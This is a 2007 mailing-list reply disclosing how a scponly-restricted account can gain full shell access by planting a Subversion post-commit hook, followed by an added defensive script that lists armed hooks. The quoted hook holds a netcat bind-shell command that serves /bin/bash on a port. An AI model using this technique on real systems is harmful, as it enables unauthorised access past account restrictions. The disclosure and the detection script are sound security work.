Hi,

On Sunday, 12.08.2007, at 07:58 +0200, Florian Weimer wrote:
> * Joachim Breitner:
> 
> > messing around with some friends here, I tried to access his computer
> > with only a scponly protected account. I discovered this way of gaining
> > full shell access:
> >
> > I locally created a subversion repository /tmp/blubb with
> > a /tmp/blubb/hooks/post-commit that contains the command:
> >         ( nc -l -p 1042 -e /bin/bash) &
> 
> This is an unfortunate interaction between scponly and Subversion, but
> not a real bug in any of the programs.  The same problem arises when a
> scponly-restricted user uploads any form of executable contents.  CGI
> scripts are more common (and their so-called "PHP shells" which are
> explicitly designed to exploit this).

I think it’s more than that. If I upload some executable, I still have
to find a way to actually execute it (e.g. a badly configured web
server). Using subversion, I execute anything in _any case_, making
scponly useless for its purpose.

Greetings,
Joachim

-- 
Joachim "nomeata" Breitner
Debian Developer
  [EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata
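
A defensive check for the interaction discussed in this message, added here as an example that is not part of the original mail nor code from scponly or Subversion: it lists the hook scripts Subversion would execute in any repository found below a given directory. The function name and the directories you pass in (for instance the home directories of restricted accounts, or /tmp) are assumptions.

```shell
#!/bin/sh
# Added example: report Subversion hook scripts that are "armed", i.e. that
# Subversion would execute when the matching repository event occurs.
# find_active_svn_hooks is a hypothetical helper name.

# Hook names Subversion looks for inside <repo>/hooks/.
SVN_HOOKS="start-commit pre-commit post-commit pre-revprop-change post-revprop-change pre-lock post-lock pre-unlock post-unlock"

# Print the path of every active hook in repositories below directory $1.
find_active_svn_hooks() {
    root=$1
    find "$root" -type d -name hooks 2>/dev/null | while IFS= read -r hooks; do
        repo=$(dirname "$hooks")
        # A repository has a "format" file and a "db" directory next to "hooks".
        [ -f "$repo/format" ] && [ -d "$repo/db" ] || continue
        for h in $SVN_HOOKS; do
            f="$hooks/$h"
            # Only an executable file with the exact hook name is run;
            # the shipped *.tmpl templates and non-executable files are inert.
            if [ -f "$f" ] && [ -x "$f" ]; then
                printf '%s\n' "$f"
            fi
        done
    done
}

# Stand-alone use: pass one or more directories to scan.
if [ "$#" -gt 0 ]; then
    for r in "$@"; do
        find_active_svn_hooks "$r"
    done
fi
```

Any path it prints inside an area a file-transfer-only account can write to is code that account can get executed through Subversion.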

